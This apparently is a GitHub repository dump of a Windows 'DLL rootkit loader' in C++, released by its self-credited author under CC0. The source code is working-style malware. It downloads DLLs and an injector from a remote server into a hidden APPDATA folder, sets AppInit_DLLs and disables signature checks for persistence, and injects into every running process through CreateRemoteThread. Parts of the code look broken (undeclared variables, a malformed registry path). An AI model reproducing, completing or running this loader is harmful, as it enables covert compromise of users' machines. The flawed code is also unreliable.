├── LICENSE ├── README.md └── dll_rootkit_loader.cpp /LICENSE: -------------------------------------------------------------------------------- 1 | Creative Commons Legal Code 2 | 3 | CC0 1.0 Universal 4 | 5 | CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE 6 | LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN 7 | ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS 8 | INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES 9 | REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS 10 | PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM 11 | THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED 12 | HEREUNDER. 13 | 14 | Statement of Purpose 15 | 16 | The laws of most jurisdictions throughout the world automatically confer 17 | exclusive Copyright and Related Rights (defined below) upon the creator 18 | and subsequent owner(s) (each and all, an "owner") of an original work of 19 | authorship and/or a database (each, a "Work"). 20 | 21 | Certain owners wish to permanently relinquish those rights to a Work for 22 | the purpose of contributing to a commons of creative, cultural and 23 | scientific works ("Commons") that the public can reliably and without fear 24 | of later claims of infringement build upon, modify, incorporate in other 25 | works, reuse and redistribute as freely as possible in any form whatsoever 26 | and for any purposes, including without limitation commercial purposes. 27 | These owners may contribute to the Commons to promote the ideal of a free 28 | culture and the further production of creative, cultural and scientific 29 | works, or to gain reputation or greater distribution for their Work in 30 | part through the use and efforts of others. 31 | 32 | For these and/or other purposes and motivations, and without any 33 | expectation of additional consideration or compensation, the person 34 | associating CC0 with a Work (the "Affirmer"), to the extent that he or she 35 | is an owner of Copyright and Related Rights in the Work, voluntarily 36 | elects to apply CC0 to the Work and publicly distribute the Work under its 37 | terms, with knowledge of his or her Copyright and Related Rights in the 38 | Work and the meaning and intended legal effect of CC0 on those rights. 39 | 40 | 1. Copyright and Related Rights. A Work made available under CC0 may be 41 | protected by copyright and related or neighboring rights ("Copyright and 42 | Related Rights"). Copyright and Related Rights include, but are not 43 | limited to, the following: 44 | 45 | i. the right to reproduce, adapt, distribute, perform, display, 46 | communicate, and translate a Work; 47 | ii. moral rights retained by the original author(s) and/or performer(s); 48 | iii. publicity and privacy rights pertaining to a person's image or 49 | likeness depicted in a Work; 50 | iv. rights protecting against unfair competition in regards to a Work, 51 | subject to the limitations in paragraph 4(a), below; 52 | v. rights protecting the extraction, dissemination, use and reuse of data 53 | in a Work; 54 | vi. database rights (such as those arising under Directive 96/9/EC of the 55 | European Parliament and of the Council of 11 March 1996 on the legal 56 | protection of databases, and under any national implementation 57 | thereof, including any amended or successor version of such 58 | directive); and 59 | vii. other similar, equivalent or corresponding rights throughout the 60 | world based on applicable law or treaty, and any national 61 | implementations thereof. 62 | 63 | 2. Waiver. To the greatest extent permitted by, but not in contravention 64 | of, applicable law, Affirmer hereby overtly, fully, permanently, 65 | irrevocably and unconditionally waives, abandons, and surrenders all of 66 | Affirmer's Copyright and Related Rights and associated claims and causes 67 | of action, whether now known or unknown (including existing as well as 68 | future claims and causes of action), in the Work (i) in all territories 69 | worldwide, (ii) for the maximum duration provided by applicable law or 70 | treaty (including future time extensions), (iii) in any current or future 71 | medium and for any number of copies, and (iv) for any purpose whatsoever, 72 | including without limitation commercial, advertising or promotional 73 | purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each 74 | member of the public at large and to the detriment of Affirmer's heirs and 75 | successors, fully intending that such Waiver shall not be subject to 76 | revocation, rescission, cancellation, termination, or any other legal or 77 | equitable action to disrupt the quiet enjoyment of the Work by the public 78 | as contemplated by Affirmer's express Statement of Purpose. 79 | 80 | 3. Public License Fallback. Should any part of the Waiver for any reason 81 | be judged legally invalid or ineffective under applicable law, then the 82 | Waiver shall be preserved to the maximum extent permitted taking into 83 | account Affirmer's express Statement of Purpose. In addition, to the 84 | extent the Waiver is so judged Affirmer hereby grants to each affected 85 | person a royalty-free, non transferable, non sublicensable, non exclusive, 86 | irrevocable and unconditional license to exercise Affirmer's Copyright and 87 | Related Rights in the Work (i) in all territories worldwide, (ii) for the 88 | maximum duration provided by applicable law or treaty (including future 89 | time extensions), (iii) in any current or future medium and for any number 90 | of copies, and (iv) for any purpose whatsoever, including without 91 | limitation commercial, advertising or promotional purposes (the 92 | "License"). The License shall be deemed effective as of the date CC0 was 93 | applied by Affirmer to the Work. Should any part of the License for any 94 | reason be judged legally invalid or ineffective under applicable law, such 95 | partial invalidity or ineffectiveness shall not invalidate the remainder 96 | of the License, and in such case Affirmer hereby affirms that he or she 97 | will not (i) exercise any of his or her remaining Copyright and Related 98 | Rights in the Work or (ii) assert any associated claims and causes of 99 | action with respect to the Work, in either case contrary to Affirmer's 100 | express Statement of Purpose. 101 | 102 | 4. Limitations and Disclaimers. 103 | 104 | a. No trademark or patent rights held by Affirmer are waived, abandoned, 105 | surrendered, licensed or otherwise affected by this document. 106 | b. Affirmer offers the Work as-is and makes no representations or 107 | warranties of any kind concerning the Work, express, implied, 108 | statutory or otherwise, including without limitation warranties of 109 | title, merchantability, fitness for a particular purpose, non 110 | infringement, or the absence of latent or other defects, accuracy, or 111 | the present or absence of errors, whether or not discoverable, all to 112 | the greatest extent permissible under applicable law. 113 | c. Affirmer disclaims responsibility for clearing rights of other persons 114 | that may apply to the Work or any use thereof, including without 115 | limitation any person's Copyright and Related Rights in the Work. 116 | Further, Affirmer disclaims responsibility for obtaining any necessary 117 | consents, permissions or other rights required for any use of the 118 | Work. 119 | d. Affirmer understands and acknowledges that Creative Commons is not a 120 | party to this document and has no duty or obligation with respect to 121 | this CC0 or use of the Work. 122 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DLL_ROOTKIT_loader 2 | 3 | Rootkit loader for your rootkit dll, x86/x64 system wide DLL injection (+appinit_dlls registry create) 4 | + changelog 5 | + added first tests for heavens gate, thinking that heavensgatetest_simple.cpp may work (not tested yet) 6 | + removed heavensgate shit cause it aint working with any library 7 | -------------------------------------------------------------------------------- /dll_rootkit_loader.cpp: -------------------------------------------------------------------------------- 1 | //dont skid this leave credit - CODED BY FREAK - http://pastebin.com/u/KekSec - https://github.com/freakanonymous 2 | //please star me on github :D 3 | //copyright??? - Freak 01/25/2021 4 | // hope this one works. 5 | #pragma once 6 | #ifndef NO_ROOTKIT 7 | #ifndef __RKIT_LOADED 8 | #define __RKIT_LOADED 9 | #include 10 | #define _WIN32_DCOM 11 | #include 12 | using namespace std; 13 | #include 14 | #include 15 | #pragma comment(lib, "wbemuuid.lib") //WMI 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #pragma comment(lib, "ntdll.lib") //for RtlAdjustPrivilege in heavens gate test 25 | #define SE_DEBUG_PRIVILEGE 20 26 | extern "C" NTSYSAPI NTSTATUS WINAPI RtlAdjustPrivilege(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN); 27 | 28 | 29 | 30 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 31 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 32 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 33 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 34 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 35 | //**//**//**//**//**//**//**//**//*DLL_ROOTKIT_loader LIBRARY START*//**//**//**//**//**//**//**//**//**//**//**//**/ 36 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 37 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 38 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 39 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 40 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 41 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 42 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 43 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 44 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 45 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 46 | //**//**//**//**//**//**//**//**//*DLL_ROOTKIT_loader LIBRARY START*//**//**//**//**//**//**//**//**//**//**//**//**/ 47 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 48 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 49 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 50 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 51 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 52 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 53 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 54 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 55 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 56 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 57 | //**//**//**//**//**//**//**//**//*DLL_ROOTKIT_loader LIBRARY START*//**//**//**//**//**//**//**//**//**//**//**//**/ 58 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 59 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 60 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 61 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 62 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | char x64injectpath[MAX_PATH + 1]; 72 | char* dllhide = "$6829"; 73 | char* mutexseparator = ":"; 74 | bool IsInjected(DWORD pid) 75 | { 76 | CHAR Mutant[64]; 77 | sprintf(Mutant, "%d%s%s", pid, mutexseparator, dllhide); 78 | HANDLE hMu = OpenMutexA(MAXIMUM_ALLOWED, 0, Mutant); 79 | if (!hMu) 80 | return 0; 81 | CloseHandle(hMu); 82 | 83 | return 1; 84 | } 85 | BOOL isrunning64 = FALSE; 86 | 87 | 88 | void inject(DWORD dwProcessId, char* dllpath32, char* dllpath64, BOOL isrunning64) { 89 | HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, false, dwProcessId); 90 | BOOL is64 = FALSE; 91 | if (h) 92 | { 93 | if (isrunning64) { 94 | if (IsWow64Process(h, &is64)) { 95 | SHELLEXECUTEINFO ShExecInfo; 96 | ShExecInfo.cbSize = sizeof(SHELLEXECUTEINFO); 97 | ShExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS; 98 | ShExecInfo.hwnd = NULL; 99 | ShExecInfo.lpVerb = NULL; 100 | ShExecInfo.lpFile = x64injectpath; 101 | char runinject[MAX_PATH * 2 + 10]; 102 | sprintf(runinject, "-t 3 %d \"%s\"", dwProcessId, dllpath64); 103 | ShExecInfo.lpParameters = runinject; 104 | ShExecInfo.lpDirectory = NULL; 105 | ShExecInfo.nShow = SW_HIDE; 106 | ShExecInfo.hInstApp = NULL; 107 | ShellExecuteEx(&ShExecInfo); 108 | WaitForSingleObject(ShExecInfo.hProcess, INFINITE); 109 | return; 110 | } 111 | } 112 | 113 | PVOID LoadLibAddr = (PVOID)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "LoadLibraryA"); 114 | LPVOID dereercomp = VirtualAllocEx(h, NULL, strlen(dllpath32), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 115 | WriteProcessMemory(h, dereercomp, dllpath32, strlen(dllpath32), NULL); 116 | HANDLE asdc = CreateRemoteThread(h, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, dereercomp, 0, NULL); 117 | 118 | } 119 | } 120 | class WMITask 121 | { 122 | protected: 123 | 124 | void WMIConnect(char* dllpath32, char* dllpath64, BOOL isrunning64, DWORD mypid); 125 | int WMIGetUserProcesses(char* dllpath32, char* dllpath64, BOOL isrunning64, DWORD mypid); 126 | 127 | ////////////////////////////////////////////////////// 128 | //////////////////WMI Structs///////////////////////// 129 | CComPtr< IWbemLocator > locator; 130 | CComPtr< IWbemServices > service; 131 | CComPtr< IEnumWbemClassObject > enumerator; 132 | 133 | CComPtr< IWbemClassObject > object; 134 | 135 | HRESULT WMIHandle; 136 | /////////////////////////////////////////////////////// 137 | 138 | public: 139 | 140 | ////////////////////////////////////////////////////// 141 | /////////////////WMI Vaiables///////////////////////// 142 | 143 | // WMI Vars : Process 144 | CString sUserProcesses; 145 | 146 | DWORD mypid; 147 | /////////////////////////////////////////////////////// 148 | 149 | WMITask(char* dllpath32, char* dllpath64, BOOL isrunning64, DWORD mypid); 150 | 151 | 152 | 153 | }; 154 | 155 | // Contructor 156 | //__________________________________________________________________________________ 157 | WMITask::WMITask(char* dllpath32, char* dllpath64, BOOL isrunning64, DWORD mypid) 158 | { 159 | WMIConnect(dllpath32, dllpath64, isrunning64, mypid); 160 | } 161 | // WMI Handler 162 | //_____________________________________________________________________________ 163 | void WMITask::WMIConnect(char* dllpath32, char* dllpath64, BOOL isrunning64, DWORD mypid) 164 | { 165 | // http://msdn.microsoft.com/en-us/library/aa389273(v=VS.85).aspx 166 | 167 | int result = 0; 168 | WMIHandle = CoInitializeEx(NULL, COINIT_MULTITHREADED); 169 | 170 | // setup process-wide security context 171 | WMIHandle = CoInitializeSecurity(NULL, // we're not a server 172 | -1, // we're not a server 173 | NULL, // we're not a server 174 | NULL, // reserved 175 | RPC_C_AUTHN_LEVEL_DEFAULT, // let DCOM decide 176 | RPC_C_IMP_LEVEL_IMPERSONATE, 177 | NULL, 178 | EOAC_NONE, 179 | NULL); 180 | 181 | // we're going to use CComPtr<>s, whose lifetime must end BEFORE CoUnitialize is called 182 | // connect to WMI 183 | WMIHandle = CoCreateInstance(CLSID_WbemAdministrativeLocator, NULL, 184 | CLSCTX_INPROC_SERVER, 185 | IID_IWbemLocator, reinterpret_cast(&locator)); 186 | 187 | if (FAILED(WMIHandle)) 188 | { 189 | // Instantiation of IWbemLocator failed 190 | 191 | CoUninitialize(); 192 | return; 193 | } 194 | 195 | // connect to local service with current credentials 196 | WMIHandle = locator->ConnectServer(L"root\\cimv2", NULL, NULL, NULL, 197 | WBEM_FLAG_CONNECT_USE_MAX_WAIT, 198 | NULL, NULL, &service); 199 | 200 | if (SUCCEEDED(WMIHandle)) 201 | { 202 | WMIGetUserProcesses(dllpath32, dllpath64, isrunning64, mypid); 203 | 204 | } 205 | else { 206 | // Couldn't connect to service 207 | } 208 | CoUninitialize(); 209 | } 210 | 211 | 212 | int WMITask::WMIGetUserProcesses(char* dllpath32, char* dllpath64, BOOL isrunning64, DWORD mypid) 213 | 214 | { 215 | ///////////////////////////////////////////////////////////////////////////////////////// 216 | // Var's & Class Declerations 217 | // 218 | 219 | int statusreturn = 0; 220 | ULONG retcnt; 221 | _bstr_t str; 222 | _bstr_t STR; 223 | _variant_t var_val; 224 | _variant_t pVal; 225 | 226 | CString Caption; 227 | CString ProcessId; 228 | CString ProcessStr; 229 | CString User; 230 | 231 | IWbemClassObject* pClass; 232 | IWbemClassObject* pwcrGetOwnerIn = NULL; 233 | IWbemClassObject* pwcrGetOwnerOut = NULL; 234 | IWbemClassObject* pOutParams = NULL; 235 | 236 | ///////////////////////////////////////////////////////////////////////////////////////// 237 | // Execute 238 | // 239 | 240 | // Execute Service Query 241 | // -------------------------------------------------- 242 | WMIHandle = service->ExecQuery(L"WQL", L"SELECT ProcessId FROM Win32_Process", 243 | WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &enumerator); 244 | // -------------------------------------------------- 245 | if (SUCCEEDED(WMIHandle)) // - Check Query Result 246 | { 247 | // -------------------------------------------------- 248 | for (;;) { // - Endless Loop, Must break manually 249 | // -------------------------------------------------- 250 | WMIHandle = enumerator->Next(WBEM_INFINITE, 1L, reinterpret_cast(&object), &retcnt); 251 | // -------------------------------------------------- 252 | if (SUCCEEDED(WMIHandle)) // - Check Query Result 253 | { 254 | if (retcnt > 0) // - Check if anymore object vars are avalible 255 | 256 | { 257 | WMIHandle = object->Get(L"ProcessId", 0, &var_val, NULL, NULL); 258 | int dwProcessId = var_val.intVal; 259 | if (!IsInjected(dwProcessId) && dwProcessId != mypid && dwProcessId != 0) { 260 | inject(dwProcessId, dllpath32, dllpath64, isrunning64); 261 | } 262 | 263 | } 264 | else { 265 | statusreturn = -3; break; // Enumeration empty(emptied) 266 | } 267 | } 268 | else { 269 | statusreturn = -2; // Error in iterating through enumeration 270 | } 271 | } 272 | } 273 | else { 274 | statusreturn = -1; // Bad ExecQuery 275 | } 276 | 277 | // Release Memory 278 | // -------------------------------------------------- 279 | 280 | 281 | // Release Memory 282 | // -------------------------------------------------- 283 | VariantClear(&var_val); 284 | VariantClear(&pVal); 285 | pClass->Release(); 286 | pwcrGetOwnerOut->Release(); 287 | pOutParams->Release(); 288 | object.Release(); 289 | 290 | Caption.ReleaseBuffer(); 291 | ProcessId.ReleaseBuffer(); 292 | ProcessStr.ReleaseBuffer(); 293 | User.ReleaseBuffer(); 294 | 295 | return statusreturn; 296 | } 297 | #pragma comment(lib, "urlmon.lib") 298 | 299 | void DownloadFile(char* url, char* dest) { 300 | 301 | HINTERNET hInet; 302 | hInet = InternetOpenA("wininet", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); 303 | if (!hInet) return; 304 | HANDLE fh, f; 305 | 306 | fh = InternetOpenUrl(ih, url, NULL, 0, 0, 0); 307 | if (fh != NULL) { 308 | 309 | // open the file 310 | f = CreateFile(dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 311 | // make sure that our file handle is valid 312 | if (f < (HANDLE)1) { 313 | return; 314 | } 315 | char fbuff[512]; 316 | DWORD r = 0, d = 0; 317 | do { 318 | memset(fbuff, 0, sizeof(fbuff)); 319 | InternetReadFile(fh, fbuff, sizeof(fbuff), &r); 320 | WriteFile(f, fbuff, r, &d, NULL); 321 | } while (r > 0); 322 | CloseHandle(f); 323 | } 324 | }/* 325 | char *getFileContent(char * pathname) { 326 | ifstream hexa; 327 | hexa.open(pathname); 328 | int size = hexa.tellg(); 329 | char* hexarray =(char*)malloc(size); 330 | 331 | while (!hexa.eof()) 332 | { 333 | for (int i = 0; i <= size; i++) 334 | { 335 | 336 | hexarray[i] = hexa.get(); 337 | } 338 | } 339 | 340 | 341 | 342 | hexa.close(); 343 | return hexarray; 344 | }*/ 345 | DWORD WINAPI rootkit(LPARAM none) { 346 | 347 | 348 | int err = 0; 349 | WSADATA WSAdata; 350 | if ((err = WSAStartup(MAKEWORD(2, 2), &WSAdata)) != 0) 351 | return 0; 352 | if (LOBYTE(WSAdata.wVersion) != 2 || HIBYTE(WSAdata.wVersion) != 2) { 353 | WSACleanup(); 354 | return 0; 355 | } 356 | ih = InternetOpen("Mozilla/4.0 (compatible)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); 357 | if (ih == NULL) ih = 0; 358 | 359 | HKEY hKey; 360 | long result = RegOpenKeyExA( 361 | HKEY_LOCAL_MACHINE, 362 | (LPCSTR)"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs", 363 | 0, 364 | KEY_WRITE, 365 | &hKey 366 | ); 367 | char dllinstallpath32[MAX_PATH + 1]; 368 | char dllinstallpath64[MAX_PATH + 1]; 369 | char exeinstallpath[MAX_PATH + 1]; 370 | sprintf_s(dllinstallpath32, "%s\\%s\\%s_32.dll", std::getenv("APPDATA"), dllhide, dllhide); 371 | sprintf_s(dllinstallpath64, "%s\\%s\\%s_64.dll", std::getenv("APPDATA"), dllhide, dllhide); 372 | sprintf_s(exeinstallpath, "%s\\%s\\%s_.exe", std::getenv("APPDATA"), dllhide, dllhide); 373 | struct stat buffer; 374 | char url32[512] = { 0 }; 375 | sprintf_s(url32, "http://%s/x86.dll", dllserver); 376 | if (stat(dllinstallpath32, &buffer) != 0) { 377 | DownloadFile(url32, dllinstallpath32); 378 | if (stat(dllinstallpath32, &buffer) != 0) return 2; 379 | } 380 | BOOL f64 = FALSE; 381 | isrunning64 = IsWow64Process(GetCurrentProcess(), &f64) && f64; 382 | char url64[512] = { 0 }; 383 | char x64injectpathurl[512] = { 0 }; 384 | if (isrunning64) { 385 | sprintf_s(dllinstallpath64, "%s\\%s\\%s_64.dll", std::getenv("APPDATA"), dllhide, dllhide); 386 | sprintf_s(x64injectpath, "%s\\%s\\%s_64i.exe", std::getenv("APPDATA"), dllhide, dllhide); 387 | sprintf_s(url64, "http://%s/x64.dll", dllserver); 388 | sprintf_s(x64injectpathurl, "http://%s/x64i.exe", dllserver); 389 | if (stat(dllinstallpath64, &buffer) != 0) { 390 | DownloadFile(url64, dllinstallpath64); 391 | if (stat(dllinstallpath64, &buffer) != 0) return 2; 392 | } 393 | if (stat(x64injectpath, &buffer) != 0) { 394 | sprintf_s(x64injectpathurl, "http://%s/x64i.exe", dllserver); 395 | DownloadFile(x64injectpathurl, x64injectpath); 396 | if (stat(x64injectpath, &buffer) != 0) return 3; 397 | } 398 | } 399 | 400 | if (result == ERROR_SUCCESS) { 401 | DWORD value0 = 0; 402 | DWORD value1 = 1; 403 | 404 | if (!isrunning64) { 405 | RegSetValueExA(hKey, "AppInit_DLLs", 0, REG_SZ, (BYTE*)dllinstallpath32, (strlen(dllinstallpath32) + 1) * sizeof(char)); 406 | } 407 | else { 408 | RegSetValueExA(hKey, "AppInit_DLLs", 0, REG_SZ, (BYTE*)dllinstallpath64, (strlen(dllinstallpath64) + 1) * sizeof(char)); 409 | } 410 | RegSetValueExA(hKey, "RequireSignedAppInit_DLLs", 0, REG_DWORD, (BYTE*)value0, sizeof(DWORD)); 411 | RegSetValueExA(hKey, "LoadAppInit_DLLs", 0, REG_DWORD, (BYTE*)value1, sizeof(DWORD)); 412 | RegCloseKey(hKey); 413 | } 414 | 415 | // check if the library has a ReflectiveLoader... 416 | //char *lpBuff = getFileContent(dllinstallpath 417 | DWORD mypid = GetCurrentProcessId(); //mypid is used for making sure we dont hook our own process 418 | while (1) { 419 | //DWORD activePID; 420 | //HWND activeWnd = GetActiveWindow(); 421 | // GetWindowThreadProcessId(activeWnd, &activePID); 422 | // if(activePID != mypid) inject(activePID, dllinstallpath32, dllinstallpath64, isrunning64); 423 | WMITask(dllinstallpath32, dllinstallpath64, isrunning64, mypid); 424 | Sleep(150); 425 | } 426 | } 427 | #endif 428 | #endif 429 | 430 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 431 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 432 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 433 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 434 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 435 | //**//**//**//**//**//**//**//**//*DLL_ROOTKIT_loader LIBRARY END*//**//**//**//**//**//**//**//**//**//**//**//**/// 436 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 437 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 438 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 439 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 440 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 441 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 442 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 443 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 444 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 445 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 446 | //**//**//**//**//**//**//**//**//*DLL_ROOTKIT_loader LIBRARY END*//**//**//**//**//**//**//**//**//**//**//**//**/// 447 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 448 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 449 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 450 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 451 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 452 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 453 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 454 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 455 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 456 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 457 | //**//**//**//**//**//**//**//**//*DLL_ROOTKIT_loader LIBRARY END*//**//**//**//**//**//**//**//**//**//**//**//**/// 458 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 459 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 460 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 461 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 462 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 463 | --------------------------------------------------------------------------------